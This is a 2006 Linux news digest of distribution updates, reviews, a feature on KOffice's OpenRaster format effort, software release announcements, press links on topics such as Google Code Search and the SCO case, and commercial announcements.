Gentoo Weekly NewsletterThe Gentoo Weekly Newsletter for October 2, 2006 covers the availability of Gentoo 2006.1 at the Gentoo Store, openoffice.org template/clipart competition, LinuxParty.sk pictures and several other topics.
Ubuntu Weekly News #16The Ubuntu Weekly Newsletter for September 30, 2006 covers the beta release of Ubuntu/Kubuntu 6.10, a report from Akademy 2006, a winning entry for a poster design competition, Universe Version Freeze, and more.
DistroWatch Weekly, Issue 172The DistroWatch Weekly for October 9, 2006. "With the release of Mandriva Linux 2007 last week it would seem that the once highly popular desktop Linux distribution has finally closed a shaky chapter behind itself and decided to return to what it does best - proudly produce a great desktop Linux system for the world. This issue of DistroWatch Weekly focuses on Mandriva Linux, its recent past and new products. But Mandriva 2007 wasn't the only major distribution release last week; the fans of Slackware Linux also had a reason to celebrate as version 11.0 of the world's oldest surviving Linux distribution finally hit the download mirrors, promptly followed by a number of Slackware derivatives for all kinds of purposes and processor architectures. Also in this issue: we'll take a quick look at the new VectorLinux 5.8, summarise the week in the troubled world of Debian GNU/Linux, and point our readers to a good comparison between openSUSE and SUSE Linux Enterprise Desktop."
Package updates Fedora updatesUpdates for Fedora Core 5: frysk (new upstream version), compat-gcc-32 (bug fixes), xsane (bug fix), perl-Archive-Tar (upstream version 1.30), tar (bug fix), tzdata (upstream version 2006m).
Mandriva updatesUpdates for Mandriva Linux 2007.0 and Corporate Server 4.0: cups (bug fixes).Updates for Mandriva Linux 2006.0: glibc (bug fixes).
rPath updatesUpdates for rPath Linux 1: conary, conary-build, conary-repository, epdb (Conary 1.0.33 maintenance release), ntp (bug fixes), spamassassin (updated), SDL (improved arts support), dovecot, am-utils, krb5, krb5-workstation, krb5-services, krb5-server, krb5-test, mysql, mysql-server, mysql-bench, postgresql, postgresql-server, vsftpd, ypserv, microcode_ctl, httpd, mod_ssl, nfs-utils (start services by default unless they are currently disabled).
Ubuntu updatesUpdates for Ubuntu 6.06 LTS: readahead-list 1:0.20050517.0220-0ubuntu5~dapper1, cpio 2.6-10ubuntu0.2, cupsys 1.2.2-0ubuntu0.6.06.1, hal 0.5.7-1ubuntu18.1, apt-mirror 0.4.4-4ubuntu1~dapper1, brasero 0.4.4-0ubuntu1~dapper1. There are also 94 language pack updates available which have not been processed due to time constraints.
Newsletters and articles of interest Foreseeing GNOME with the latest Foresight Linux (DesktopLinux)DesktopLinux covers the release of Foresight 0.9.8.2. "Foresight Linux, the distribution for those who like living on GNOME's cutting edge, has just been updated. One of the distro's lead developers, Antonio Meireles, announced this week that the latest Foresight 0.9.8.2 is now available. The release includes "the usual bug fixes and package updates, including the latest stable gnome (2.16.1) package set and an the latest Google Earth release, a revamped X.org subsystem and a new default kernel (2.16.18)," according to Meireles."
Behind the Debian and Mozilla dispute over use of Firefox (Linux.com)Linux.com covers Debian's Iceweasel browser. "Debian plans to release its newest version, Etch, in December, and wants Mozilla's Firefox Web browser to be part of the distribution. Mozilla, however, told Debian it couldn't release the software without its accompanying artwork. Now a legal expert says that the existing distinctions between copyright and trademark laws should have prevented this from becoming an issue in the first place."
Install .rpm Files in Debian and Ubuntu (Debian Admin)Debian Admin looks at installing rpm files with alien. "Some time you might find some applications are having only .rpm files but you want a .deb package for your debian,Ubuntu and other debian derived ditributions.If you can't find .deb debian package in any of the debian,ubuntu repositories or elsewhere, you can use the alien package converter to install the .rpm file."
SUSE Linux 10: easy to use, cheaper to run (eChannelLine)Dave Chappelle looks at Novell SUSE Linux 10 Enterprise Desktop. "Novell CTO Ross Chevalier is traveling the continent giving demonstrations of Novell SUSE Linux 10 Enterprise Desktop. When Novell decided to deliver its version of the best operating system, it first had to learn what users wanted in an OS. To accomplish that objective, Novell started betterdesktop.org."
What's the best Linux for beginners? (DesktopLinux)DesktopLinux picks three favorite easy-to-use "Windows replacement" Linux distributions. "There are many users, some with far less experience than he has, who are sick to death of Windows and the constant need to keep it, and third-party security software, up to date to even have a chance of having a healthy PC. But, at the same time, many of these users aren't interested in learning Linux. They just want an operating system that will let them get email, browse the Web, and run a few simple office applications." Their top three: MEPIS Linux, Xandros Linux and Freespire.
Distribution reviews Easys GNU/Linux 3.0 released (DesktopLinux)DesktopLinux takes a look at easys GNU/Linux version 3.0. "Marcus Moeller has announced the release of version 3.0 of Easys GNU/Linux (formerly PocketLinux), a single-CD Slackware-based distro. The new release boasts a 2.6.17.13 Linux kernel and "full" KDE 3.5.4 desktop instead of the "KDE light" supplied in prior versions."
Christian Linux, and it's not a joke this time (Linux-Watch)Linux-Watch takes a look at UbuntuCE, Ichthux and other Christian-themed distributions. "Six-years ago, there was a hoax Linux: Jesux, the Linux distribution for Christians. That was a joke. Today, it's real. In fact, there are several Christian Linuxes. Perhaps the most well-known of these is UbuntuCE (Christian Edition), which is built on top of Ubuntu 6.06.1 LTS."
Mandriva Shoots but Doesn't Score (eWeek)eWeek reviews Mandriva Corporate Server 4. "Mandriva's Mandriva Corporate Server 4 is a decent Linux server operating system that we found somewhat marred by a virtualization technology reach that exceeds its grasp--CS 4's advertised inclusion of VMware's VMware, OpenVZ and Xen didn't meet our expectations. We're all for broadened server application deployment options, but CS 4 could use more integration work."
Review: Turbolinux 11 'Fuji' (Linux.com)Linux.com reviews Turbolinux 11 "Fuji". "Turbolinux has been around since 1992. Everyone knows about this commercial distro, but for some reason it never became as popular as SUSE or Mandriva. Turbolinux 11, code-named "Fuji," was released recently and I decided it was time to see if Turbolinux measures up to other Linux distros. The Fuji release has some interesting features, but I found the release to be a disappointment overall."
Page editor: Rebecca Sobol Development KOffice and ODFKOffice has seen a huge surge in exciting feature development in the past year, putting it in the same league as free software giants such as OpenOffice.org and The GIMP, and even surpassing them in places. With version 1.6 due out this Sunday (October 15) it's timely that Krita, KOffice's painting application, is now leading an effort to develop a fairly boring feature, an open graphics file format. Boring, but potentially very useful. In the first place we currently only have The GIMP's XCF format, which fulfills some of the needs shared by free raster graphics applications but effectively serializes the internal structures of the application in one binary blob. Then there is TIFF, a format so horrendously complicated and unstandardized that nobody seems to want to fully implement it. Having a format that caters for everybody's needs, and that allows raster graphics to be exchanged between applications, is obviously a good thing. While there was some controversy surrounding the decision to make yet another format, rather than using the XCF2 specification under development, some GIMP developers have begun working on OpenRaster. It is now being drafted within the CREATE initiative, part of freedesktop.org. Inge Wallin, KOffice's marketing lead, told LWN that they also plan to invite Adobe and Corel to collaborate on the specification. The second major strength of OpenRaster is that it fits nicely into the OpenDocument craze, adding raster graphics to the range of document types already supported. OpenDocument gives developers a lot of their needs for free, such as wrapping up metadata, settings and bitmaps in XML. At aKademy, the KDE community's annual developer conference, the KOffice developers got a chance to discuss lessons they can learn from SVG with a member of the audience who happened, according to Wallin, to be something of an expert on the subject. SVG, of course, already implements similar features in XML and is well-structured. Using OpenDocument as a basis means a lot of the technical work is already done for them. But more importantly, by piggybacking on the initiative of OpenDocument in government and industry circles, OpenRaster will gain a far wider exposure than any format that was developed primarily within the free software community. The OpenDocument movement also wins in three ways. First it gains a proper raster format. Second, this format demonstrates the flexibility and extensibility of the specifications. Finally, because the effort is being led by KOffice developers, with collaboration from The GIMP developers amongst others, it helps overcome the impression that OpenDocument is basically OpenOffice.org's document format suite, rather than a range of well supported exchange formats. In fact, OpenDocument has been the default file format for KOffice since the release of version 1.5 in April, 2006. The office suite has been developing much faster than OpenOffice.org, and KFormula sports the most complete implementation of OpenDocument and MathML thanks to a Google Summer of Code project. It's not just graphics where KOffice is breaking new ground, either. The developers of Kexi, a free competitor for Microsoft Access, Filemaker and Oracle Forms, told LWN that they are in the early stages of developing an OpenDocument specification for databases. The rough plan is to develop an XML exchange format that may be agnostic about the storage layer, or may use a widely supported technology such as SQLite. So what does the future hold? According to Boudewijn Rempt, who is leading the OpenRaster initiative, the first complete specification should be released in a couple of months. Once that is more or less ready, the Krita developers will start implementing it. If KDE 4 is out in time, and all goes according to plan with KOffice 2, the format may be the default in Krita 2. Otherwise it will remain a reference implementation, awaiting full integration after Krita 2.0 is released. As for its status as an OpenDocumentFormat, version 1.1 of the ODF specification has just come out. Version 1.2, which will be put through the ISO process again, is expected in early 2008, so it is hoped that OpenRaster and perhaps even the database format can be part of the specification by then. Artists will have good reason to expect developers to implement support in major free applications if it does, and we may even see the industry giants coming on board within that timescale. OpenDocument moves one step closer to format predominance.
System Applications Audio Projects JACK 0.102.20 releasedVersion 0.102.20 of the JACK audio connection kit is out. "Now with experimental MIDI support!" See the release notes for more details.
Database Software MySQL 5.0.26 has been releasedVersion 5.0.26 of the MySQL DBMS is available. "This is a bugfix release for the current production release family."
SQLite 3.3.8 releasedVersion 3.3.8 of SQLite, a lightweight DBMS, is available. "Version 3.3.8 adds support for full-text search using the FTS1 module. There are also minor bug fixes. Upgrade only if you want to try out the new full-text search capabilities or if you are having problems with 3.3.7."
LDAP Software The Apache Directory Project Announces LDAPv3-Certified ServerThe Apache Software Foundation has announced the availability of ApacheDS 1.0, a Java-based embeddable LDAP server. "Aiming to build an enterprise directory server platform, the Apache Directory Project created ApacheDS 1.0 as an LDAPv3 server with the ability to plug in other protocol modules. ApacheDS 1.0 contains other Internet protocol services such as DNS, DHCP, Change Password, and Kerberos, which store their records within a common store and allow access to that data through LDAP. ApacheDS 1.0 enables the pluggable services to back their data within the Apache Directory Server's backing stores without any network latency or going through the LDAP line protocol."
Libraries libX11 1.1 RC1 (1.0.99.1) announcedVersion 1.1 RC1 of libX11 has been announced. "This release includes the Xlib/XCB work, which uses XCB as the Xlib transport layer, and allows a client to use both Xlib and XCB on the same connection. This allows clients to transition from Xlib to XCB incrementally."
XCB 1.0 RC2 now availableRelease candidate 2 of XCB 1.0 (xcb-proto and libxcb) is out. "We have provided this second candidate release to allow for more widespread review and testing before XCB 1.0. As of version 1.0, libxcb will provide a stable API and ABI; future changes will consist only of additions, and applications compiled against XCB 1.0 or newer will work with all future versions of XCB. Barring discovery of serious issues with the API, we do not anticipate any API changes between this release and the 1.0 release. We would greatly appreciate API review in this final release candidate period."
Mail Software Apache SpamAssassin 3.1.6 availableVersion 3.1.6 of the Apache SpamAssassin email filter is available. "3.1.6 includes a large number of bug fixes and documentation updates."
Apache SpamAssassin 3.1.7 availableVersion 3.1.7 of Apache SpamAssassin has been announced. "3.1.7 is a "quick-fix" release; it contains only a fix for one bug, introduced accidentally in 3.1.6".
Networking Tools bartlby 1.2.3r2 releasedVersion 1.2.3r2 of bartlby is out with minor improvements. "Bartlby is a network and system monitor, completely written in C, to provide a scalable framework with the ability to monitor networks of various sizes. It consists of a core daemon, several plugins, and a Web GUI (PHP extension). The core daemon checks (over active/passive TCP) services/hosts and notifies users in case of critical service conditions (mail, SMS, ICQ, and custom triggers are supported). Bartlby provides an open plugin interface to give every administrator an easy to use option to extend the plugin base, and a fully customizable GUI (written in PHP using a C extension). Nearby everything can be controlled via an XML interface."
Printing JASmine 0.0.3 releasedVersion 0.0.3 of JASmine, a page accounting system for the for CUPS print system, is out. "Released on October 3, 2006, it features server stats, bug corrections and many improvements. Read the release notes."
Security GnuPG 1.9.92 releasedVersion 1.9.92 of GnuPG, a free implementation of the OpenPGP standard, is out. "We are pleased to announce the availability of GnuPG 1.9.92 - one of the last steps towards a 2.0 release. The 1.9 branch of GnuPG features the OpenPGP as well as the S/MIME protocol. You should consider using GnuPG 1.9 if you want to use S/MIME. The included GPG-AGENT is also helpful when using the stable GPG version 1.4 or if you want to use its ssh-agent replacement feature (including smart card support). Note, that this version is still in beta state. The final release of GnuPG 2.0 is scheduled for November."
Web Site Development Featured Photo 1.0.0 released (SourceForge)Version 1.0.0 of Featured Photo is out. "Featured Photo is a module that allows you to display "featured photos" on the homepage of your phpWebSite. This release requires phpWebSite 1.0.x. The new 1.0.0 release was completely rewritten for phpWebSite 1.0.x. Because of this, compatibility with phpWebSite 0.10.x was lost. (0.10.x users can still download Featured Photo 0.4.0). New in this release is the ability to add photo blocks to more than just the homepage. Each page could have its own featured photo. In addition, "click to enlarge" is finally implemented."
Midgard 1.8beta2 releasedVersion 1.8 beta 2 of the Midgard content management system is available. "The Midgard Project has released the second beta release version for the upcoming 1.8 stable branch of the Midgard Open Source Content Management System. Midgard's 1.8 branch focuses on improved stability for Midgard2 technology preview features introduced in 1.7 branch."
Struts 2.0.1 Development Build AnnouncedApache Software Foundation has announced the release of the Struts 2.0.1 development build. "Formerly known as WebWork 2, Struts 2 was created after the independent developer community, WebWork, and the Apache Struts Project joined forces in December 2005. Building on the success of Struts 1, the de-facto Open Source standard framework for creating Java-based Web applications, Struts 2 bridges existing standards to easily create and maintain enterprise-grade applications."
Desktop Applications Audio Applications Ardour 2.0 beta 5 releasedVersion 2.0 beta 5 of Ardour, a multi-track audio editor, has been announced. "This release features a huge number of improvements and fixes since the last beta."
Calendar Software Sunbird and Lightning 0.3 ReleasedVersion 0.3 of Mozilla Sunbird and Lightning have been announced. "The Mozilla Calendar Project is please to announce the release of Sunbird and Lightning 0.3. Thanks to the hard work of our localizers, both Sunbird and Lightning are available immediately in 17 different locales."
Desktop Environments GNOME 2.16.1 releasedVersion 2.16.1 of the GNOME desktop environment has been released. "This is the first release in a series of point releases for the 2.16 branch. Come and see all the bug fixing, all the new translations and all the updated documentation brought to you by the wonderful team of GNOME contributors! While development has started on the GNOME 2.17/2.18 road, work on the stable branch continues to make it even more solid."
GARNOME 2.16.1 releasedVersion 2.16.1 of GARNOME, the bleeding-edge GNOME distribution, is out. "This release incorporates the GNOME 2.16.1 Desktop and Developer Platform, fine-tuned and updated with love by the GARNOME Team. As usual it includes updates and fixes after the official GNOME freeze, together with a host of third-party GNOME packages, Bindings and the Mono(tm) Platform -- this is the second release of the current stable GNOME branch, ironing out yet-more bugs, hopefully adding yet-more stability and ships with the latest and greatest stable releases."
GNOME Software AnnouncementsThe following new GNOME software has been announced this week:
KDE 3.5.5 releasedKDE 3.5.5 is out. This is a maintenance release, but it also includes an upgraded version of Kopete, various improvements to KHTML, and some additional translations.
KDE Software AnnouncementsThe following new KDE software has been announced this week:
KDE Commit-Digest (KDE.News)The October 8, 2006 edition of the KDE Commit-Digest has been announced. "In this week's KDE Commit-Digest: KBoard, a game canvas, gets several new chess-based themes, whilst KSokoban gets many new levels. KPhotoAlbum imports the winning entry from its Splashscreen Contest. Krazy and apidox (parts of the EBN test suite) move from playground into the kdesdk module. KBlog, a library to interface with various blogs, is imported into the PIM playground in KDE SVN. Work begins on a GStreamer backend for Phonon. More work on Yahoo Chatroom support in Kopete. Kexi Query Designer supports data sorting in design and SQL view. Painting experiments with Chinese brushes in Krita."
Portland 1.0 releasedOSDL has announced the "highly anticipated general release" of Portland 1.0 - a set of low-level interfaces intended to be shared between multiple free desktop systems. "Portland 1.0 includes a set of command line tools designed to help Independent Software Vendors (ISVs) install and integrate their applications in the major Linux desktop environments. The programming interfaces, built to specifications established by freedesktop.org, provide developers with an easy method for executing the most common installation and integration tasks." See the project page for more information.
Electronics New OpenCollector releasesThe OpenCollector site lists three new electronic applications: asco 0.4.5 - a SPICE circuit optimizer, OpenPCD 0.4 - a 13,56MHz RFID reader, and eispice 0.4 - a ground-up re-write of the Berkley Spice 3 Simulation engine.
Financial Applications GnuCash 2.0.2 and GnuCash Docs 2.0.1 releasedVersion 2.0.2 of the GnuCash financial application and version 2.0.1 of GnuCash Docs have been released. "Personal and small business accounting in GNU/Linux will be easier and better after today's release of GnuCash 2.0.2. This release of the free, open source accounting program improves on the generational advances in the last version. GnuCash 2.0 is based on state-of-the-art gtk2 GUI technology."
Games WorldForge Meeting SummaryA Meeting Summary has been posted for the October 7, 2006 WorldForge game project meeting. "We had a meeting again this Saturday, doing a status check and looking at the next steps to take."
Music Applications Dino 0.2.2 is releasedVersion 0.2.2 of Dino, a a pattern-based MIDI sequencer, is available. "This is only a bugfix release. 0.2.1 did not compile with more recent versions of gtkmm and GCC (I'm not sure which one of them causes it), this release fixes that."
Web Browsers Mozilla Firefox 2 Release Candidate 2 Available (MozillaZine)MozillaZine has announced the availability of Mozilla Firefox 2 Release Candidate 2. See the release notes for more information.
Miscellaneous ANNA 1.0 releasedVersion 1.0 of ANNA is available. "ANNA: (Artificial Neural Network Architecture) is a Back propagation neural network class developed thinking in a good matching class to the FLTK. The distribution include the source code and a demo which should work on Linux systems. The structure is very flexible and you can change in a simple way the number of inputs, number of hidden layers, number of neurons per layer and the outputs. There is included a nice Structure editor, where you can visualise the neuronal network structure."
Release 0.8 of demexp softwareVersion 0.8 of demexp is available with new features, translation work and bug fixes. "demexp is an electronic voting system for wide scale direct democracy. demexp is developed mainly to support the democractic experience project, but can be used in other contexts (communities, firms, ...)."
The NEPOMUK-KDE implementation effortThe Nepomuk project has been announced. "Nepomuk is an european research project which intends to create the "Social Semantic Desktop", a comprehensive solution methods, data structures, and a set of tools for extending the personal computer into a collaborative environment, which improves the state of art in online collaboration and personal data management and augments the intellect of people by providing and organizing information created by single or group efforts. Thus, the Nepomuk project intends to provide the basis for implementations of the idea of the "Social Semantic Desktop"."
Languages and Tools BASIC KidBASIC 0.3 Released (SourceForge)Version 0.3 of KidBASIC has been announced. "KidBASIC is an easy to use version of BASIC designed to teach young children the basics of computer programming. It has a built-in graphics mode which lets them draw pictures on screen in minutes, and a set of detailed, easy-to-follow tutorials that introduce programming concepts through fun exercises. Version 0.3 eliminates the line-numbering syntax of previous versions, replacing it with labels. Performance has also been increased slightly. Linux source tarballs are now available."
Caml Caml Weekly NewsThe October 10, 2006 edition of the Caml Weekly News is out with new Caml language articles. Topics include: Bindlib 3.0, float rounding, Memoization, Ancient module, and ocamlopt under win32.
Haskell Haskell Weekly NewsThe October 3, 2006 edition of the Haskell Weekly News is online. "Developments this week include Lennart Kolmodin's new inotify bindings for Haskell, work begins on Spanish translations of Haskell literature, and new versions of Darcs and Cabal have been tagged."
Java PMD 3.8 released (SourceForge)Version 3.8 of PMD, a Java source code analyzer, has been released. "PMD 3.8 has four fine new rules: BrokenNullCheck (by Wouter Zelle), AvoidRethrowingException (by George Thomas), and UnnecessaryWrapperObjectCreation and UselessStringValueOf, both written by Xavier Le Vourch. There are a slew of bugfixes and improvements to various rules".
YALE 3.4 released (SourceForge)Version 3.4 of YALE, a Java environment for machine learning and data mining, is available. "Beside other major improvements and several bugfixes this version also contain a new macro system and provide furtherly improved plotting techniques."
What is Java Content Repository (O'ReillyNet)Sunil Patil discusses Java content repositories on O'Reilly. "You might have heard of JSR-170, but what is a content repository, and what can you do with it? Well, do you want to manage documents with versioning, search, access control, and more? Content repositories offer these features, and JSR-170 codifies them into a single API. Sunil Patil shows how to use the reference implementation--Apache Jackrabbit--to create a blogging application."
Lisp GNU CLISP 2.40 releasedVersion 2.40 of GNU CLISP, a Common Lisp implementation, is out. "This version provides new configuration and build options, new socket functions, improved debugging information, and the usual bug fixes."
Perl Weekly Perl 6 mailing list summary (O'Reilly)The October 1-7, 2006 edition of the Weekly Perl 6 mailing list summary has been published. Take a look for the latest Perl 6 developments.
PHP KCAPTCHA 1.2.4 releasedStable version 1.2.4 of KCAPTCHA has been announced. "KCAPTCHA provides CAPTCHA (a visual human validation tool) with font distortion. It requires no PHP font libraries (only GD). "
Python Python Imaging Library 1.1.6 b2 is outVersion 1.1.6 beta 2 of the Python Imaging Library, a collection of image processing utilities, is out with new features and bug fixes. See the changes document for details.
python-dev SummaryThe python-dev Summary for August 1-15, 2006 is out with coverage of the python-dev mailing list.
Dr. Dobb's Python-URL!The October 10, 2006 edition of Dr. Dobb's Python-URL! is online with a new collection of Python article links.
Tcl/Tk Dr. Dobb's Tcl-URL!The October 10, 2006 edition of Dr. Dobb's Tcl-URL! is online with new Tcl/Tk articles and resources.
Miscellaneous Cloak 1.0 releasedStable version 1.0 of Cloak has been announced. "Cloak (from Comment Locator) is a source code comment extraction and archiving utility. It has many potential uses, but the initial intent was the indexing and searching of comments in code."
Page editor: Forrest Cook Linux in the news Recommended Reading Google crawls into source-code search (ZDNet)ZDNet looks at the new Google Code Search site. "Google is taking its search expertise to one of its favorite audiences: software developers. The company on Thursday launched a Web site, Google Code Search, which the company says will let programmers search billions of lines of code for tips on how to write their own software. The service, conceived by the Google Labs early technology group, will crawl publicly available code, most of which is made available through open-source projects. The search and indexing covers code on Web pages and code that resides in compressed files, said Tom Stocky, a product manager at Google."
Making sense of the One Laptop Per Child proprietary software row (Jem Report)The Jem Report has published an article on the OLPC/NDA issue featuring interviews with a number of people, including Richard Stallman: "I have never signed an NDA for generally useful technical information, and I don't want to start now. On the other hand, I can see how, since it eliminates a greater wrong, it can be justified in this case. It is an unfortunate example, but it could also eliminate the problem."
Trade Shows and Conferences Ohio LinuxFest 2006 brings a record crowd (Linux.com)Linux.com covers the Ohio LinuxFest 2006. "More than 1,000 people turned out on Saturday for the Ohio LinuxFest 2006 at the Greater Columbus Convention Center (GCCC) in downtown Columbus, Ohio. The LinuxFest featured big-name speakers such as Jon 'maddog' Hall, Chris DiBona, and Jeff Waugh, and live penguins from the Columbus Zoo."
The SCO Problem The Goldfarb Declaration (Groklaw)Time for an update from SCOland: Groklaw has the declaration from Lawrence Goldfarb, one of the founders of BayStar. "Sometime in 2003, I was approached by Richard Emerson (Microsoft's senior vice president for corporate development and strategy) about investing in SCO, a company about which I knew little or nothing at the time. Mr. Emerson stated that Microsoft wished to promote SCO and its pending lawsuit about IBM and the Linux operating system. But Microsoft did not want to be seen as attacking IBM or Linux. For that reason, Microsoft wanted to further its interest through independent investors like BayStar." The bad news, from SCO's point of view, is that, according to this testimony, IBM had nothing to do with BayStar's subsequent decision to bail out of the SCO investment.
Companies Canonical seeks profit from free Ubuntu (ZDNet)ZDNet takes a look at Canonical's business model. "If you want to understand Canonical's Linux business strategy, think Red Hat 2000. Canonical is the 65-employee start-up behind a popular version of Linux called "Ubuntu". The company is betting that it can win a place in the market using a strategy that dominant Linux seller Red Hat has dropped."
Red Hat hires top channel exec (Linux-Watch)Linux-Watch covers Red Hat's hiring of Mark Enzweiler. "Everyone in the channel business knows that Red Hat Inc. has never done all that well by its system integrator, value-added reseller, and solution provider partners. Things are about to change, however, with the hiring of Mark Enzweiler as its VP North American Channel Sales. Enzweiler is extremely well regarded in channel circles."
Terra Soft moves past Apple with first Cell-based supercomputing cluster (IT Manager's Journal)IT Manager's Journal covers Terra Soft Solutions. "The announcement last year that Apple was moving to Intel-based hardware might have seemed like a fatal blow to Terra Soft Solutions, a company best-known for the Yellow Dog Linux distro. However, Kai Staats, CEO of Terra Soft, says that the move may be a blessing in disguise. The company has moved on to bigger and better ventures -- including construction of the first Cell-based supercomputing cluster."
Legal Konsole license violations highlight GPL confusion (Linux.com)Linux.com covers some allegations of GPL violations. "In July, Konsole author Lars Doelle posted a note on the MotorolaFans.com forum about two programs that appear to violate the GNU General Public License (GPL), under which Konsole is licensed. GPL violations are nothing new, but in this case Doelle has not only put the violators on notice, he's also telling users to stop using the offending programs as well."
Resources Get your FLAC on with MP3FS (Linux.com)Linux.com uses MP3FS to play FLAC files on an MP3 player. "I don't know if the folks at Xiph.org can live day-in and day-out using only the free Vorbis, FLAC, Speex, and Theora codecs, but the rest of us routinely run into consumer devices that don't recognize and support them. But with a little help from Filesystem in Userspace (FUSE) and MP3FS, you cross one incompatibility off that list. MP3FS lets you mount a directory hierarchy of FLAC audio files and transparently present them as MP3s to software and hardware devices alike."
Sharing Internet Connections (O'ReillyNet)O'ReillyNet covers the use of fwbuilder on FreeBSD. "Before creating the rules you need within fwbuilder to share your internet connection, make sure that your network is properly set up. The computer running fwbuilder needs to have a NIC, which it uses to communicate with the other computers in your home network. This NIC is separate from the hardware you use to communicate with your ISP; that might also be a NIC (in the case of a cable or DSL connection) or it might be a modem (in the case of a dial-up PPP connection). Make sure the NIC you use to communicate with your other computers is plugged into the same hub or switch as your other computers."
Seven Linux distros fight over one old ThinkPad (DesktopLinux.com)Rick Lehrbaum tests seven single-CD Linux distributions on an old IBM ThinkPad laptop. "Like most companies, my employer has a stash of old, "obsolete" PCs and laptops that won't run the latest versions of Windows worth a darn. Naturally, this represents a great source of systems for testing the latest Linux distributions. I thought it would be interesting to find out which modern Linux distro made the best OS for a supposedly "obsolete" old laptop."
CLI Magic: Running multiple jobs with xjobs (Linux.com)Linux.com looks at xjobs. "Ever feel like you're not getting the most out of your multiprocessor machine? The xjobs utility allows you to schedule several processes to run simultaneously to make the most of your system's resources. Xjobs takes a list of arguments from standard input and passes them to a utility, or takes a list of commands from a script, and then runs the jobs in parallel. If you have a multiprocessor machine, xjobs will automatically run one job per processor by default."
Version control for Linux (developerWorks)developerWorks has put up a survey of source code management systems which run on Linux. "Arch is a specification for a decentralized SCM that offers many different implementations. These include ArX, Bazaar, GNU arch, and Larch. Arch not only operates as a decentralized SCM, but also uses the changeset model. The Arch SCM is a popular method for open source development because developers can develop on separate repositories with full source control. This is because the distributed repositories are actual repositories complete with revision control. You can create a patch from changes in the local repository to be used by an upstream developer. This is the real power of the decentralized model." (Thanks to Jake Edge).
Reviews Book review: ImageMagick Tricks (Linux.com)Linux.com reviews the book ImageMagick Tricks from Packt Publishing. "Command-line utilities can be powerful, but it takes some doing to make a typical desktop user work in the shell. The image manipulation program ImageMagick is one command-line program that gives users a good reason to use the CLI. Now Packt Publishing has released ImageMagick Tricks, a book that covers ImageMagick from the ground up. If you've never used ImageMagick before, this book is a good starting place."
AI versus AI: N.E.R.O. on Linux (Linux.com)Linux.com plays with Neuro-Evolving Robotic Operatives (N.E.R.O.). "If you've ever been frustrated with the artificial intelligence (AI) in video games, then you are a prime candidate for Neuro-Evolving Robotic Operatives (N.E.R.O.), a cross-platform combat game where the key to winning is training your own intelligent non-player characters. On the field of play, the only rule is "let the best AI win." I tested my skills with the Linux client, and found N.E.R.O. to be a very different sort of game."
OOo gives chart module a brand new look (Linux.com)Linux.com looks at recent improvements to the OO.o chart module. "Want to see a dinosaur? Press the Chart button in OpenOffice.org Calc, and you will be presented with a real software relic. While other parts of OpenOffice.org have been thoroughly redesigned and updated, the features and the overall look of the chart module remain virtually untouched since version 1.0. The situation is changing, though, as a group of OpenOffice.org developers has started to work on a new chart module. The first results of their endeavors were presented on this year's OOoCon. Here is what they've done so far."
Miscellaneous Good-bye Mr. Noorda (Linux-Watch)Steven J. Vaughan-Nichols remembers Ray Noorda. "Indeed, not long before he retired because of the onslaught of Alzheimers, Noorda believed that Linux was the future for Novell and supported Bryan Sparks and Ransom Love in an internal Linux skunkworks project. Novell, by then under Bob Frankenberg, killed off the Linux project. Soon thereafter, Noorda cut his ties with Novell. Noorda wasn't done with Linux even if the Novell of the mid-90s was. He used his investment company, The Canopy Group, to bankroll Caldera Systems, one of the first Linux companies."
Page editor: Forrest Cook Announcements Non-Commercial announcements Qualcomm and Mozilla to make an open-source EudoraRemember the Eudora mail client? Qualcomm has announced that it will be working with Mozilla to make an open-source version of Eudora based on Thunderbird. "Future versions of Eudora will be free and open source, while retaining Eudora's uniquely rich feature set and productivity enhancements. QUALCOMM and Mozilla will each participate in, and continue to foster development communities based around the open source Mozilla project, with a view to enhancing the capabilities and ease of use of both Eudora and Thunderbird."
Commercial announcements Agilysys and Red Hat Partner To Deliver Open Source SolutionsAgilysys, Inc. has announced a partnership with Red Hat. "Agilysys, Inc., a leading provider of enterprise computer technology solutions, and Red Hat, Inc., the world's leading provider of open source solutions to the enterprise, today announced that the two companies have signed an enterprise reseller agreement to deliver Red Hat solutions and the benefits of open source to Agilysys customers."
Mandriva Signs Agreement to Acquire LinboxMandriva has announced the signing of a definitive agreement to acquire Linbox, pending shareholder approval. "Active in both Open Source and Linux market for 10 years, Linbox develops and markets software infrastructure administration products for medium to large organizations. The software products marketed by the company encompass authentication, back up and asset management, and more. Linbox has two flagship products, Linbox Directory Server ("LDS") and Linbox Rescue Server ("LRS")."
Terra Soft and Sony to Build World's First Cell ClusterTerra Soft has announced the construction of the first Cell-based supercomputing cluster. "In the fall of '05, Terra Soft was contacted by Sony Computer Entertainment, Inc. (SCEI) to develop and manage a supercomputing cluster built upon the IBM Cell Broadband Engine and the Linux OS. This spring, Terra Soft was contracted by Sony and in August completed the construction of a 3000 sq-ft supercomputing facility capable of housing 2400 1U systems. In this remodeled extension to the Loveland, Colorado headquarters, Terra Soft will construct a test cluster and a substantially larger production cluster."
Wind River and Cavium Networks Announce Device Software Optimization for Multi-core MIPS64 ProcessorsCavium Networks, Inc. and Wind River, Inc have announced the availability of the Wind River Platform for Network Equipment and Wind River VxWorks 6.1 for Cavium Networks' OCTEON Multi-core MIPS64 based Processor Family. "The OCTEON(TM) Processor family consists of 1 to 16 MIPS64 based cnMIPS(TM) cores providing up to 16GHz of 64-bit compute processing on a single chip. Additionally, OCTEON incorporates the most advanced multi-layer application acceleration for networking control, data and services applications. The OCTEON Processor family integrates up to 8 Gigabit ports, up to dual SPI-4.2, PCI-X, up to 144-bit DDR2 controller, up to dual 18-bit RLDRAM II controllers, on-chip packet processing, QoS, TCP, compression/ decompression, encryption and pattern matching acceleration hardware to deliver a substantial price, performance and power benefit over alternative solutions."
Wyse Debuts New High-Speed Wireless Thin ClientsWyse Technology has announced a new line of Wi-Fi enabled thin clients. ""The factory installed wireless capability, with the software and hardware fully integrated, enables a variety of new applications for quick, secure deployment in hotel lobbies, airport kiosks, hospitals and school rooms," said Tarkan Maner, president of worldwide field operations, Wyse Technology. "The simple, secure set-up of a horizontal or vertical wall-mounted Wyse wireless product enables our customers to operate in places that haven't been able to be wired with traditional Ethernet.""
New Books Prentice Hall publishes Embedded Linux Primer: A Practical Real-World ApproachPrentice Hall has published the book Embedded Linux Primer: A Practical Real-World Approach by Christopher Hallinan.
Prentice Hall Publishes Core Python Programming, 2nd editionPrentice Hall has published the New Second Edition of Core Python Programming, by Wesley J. Chun.
